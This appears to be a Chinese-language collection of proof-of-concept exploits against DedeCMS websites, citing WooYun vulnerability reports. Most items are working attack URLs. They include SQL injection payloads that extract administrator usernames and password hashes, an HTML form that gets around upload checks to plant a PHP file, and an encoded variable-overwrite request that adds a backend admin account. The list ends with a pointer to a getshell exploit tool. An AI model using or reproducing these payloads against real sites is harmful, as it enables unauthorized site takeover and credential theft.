1、http://www.123.com/plus/feedback.php?aid=11552
参考:http://www.wooyun.org/bugs/wooyun-2013-017816
POC:
http://www.123.com/plus/feedback.php?validate=ZFCU&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0%27%2C%273%27%2C%274%27%2C%275%27%2C%270%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%27aaaaaa%27%29%2C+%28%2711552%27%2C%272%27%2C@%60%27%60%2C%274%27%2C%275%27%2C%271%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%28SELECT+concat%28uname%2C0x5f%2Cpwd%2C0x5f%29+FROM+%60%23@__admin%60+limit+3%2C1%29%29%23
2、http://www.123.com/plus/search.php?keyword=as
参考:http://www.wooyun.org/bugs/wooyun-2013-017613
POC:
http://www.123.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
3、http://www.123.com/member/ajax_membergroup.php
说明:若有漏洞则可直接爆出管理账号
POC:
http://www.123.com/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
4、上传漏洞脚本(要求网站开启新会员注册,注册并登陆,无需通过邮件验证)
<form action="http://www.123.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="help.Php"/> <button class="button2" type="submit">提交</button><br><br> 1、必须登陆用户。<br> 2、将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。<br> 3、newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。<br> </form>
5、/data/mysql_error_trace.inc 泄露后台与相关信息
参考:http://www.wooyun.org/bugs/wooyun-2013-022534
6、参考:http://zone.wooyun.org/content/4164
说明:直接覆盖添加后台登录用户spider密码admin,v57和v57 sp1测试可成功
POC:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
7、POC:
http://www.123.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23%22;
8、由dedecms变量覆盖漏洞引起的getshell exp
参考:http://zone.wooyun.org/content/4231
工具下载:dede_exp.zip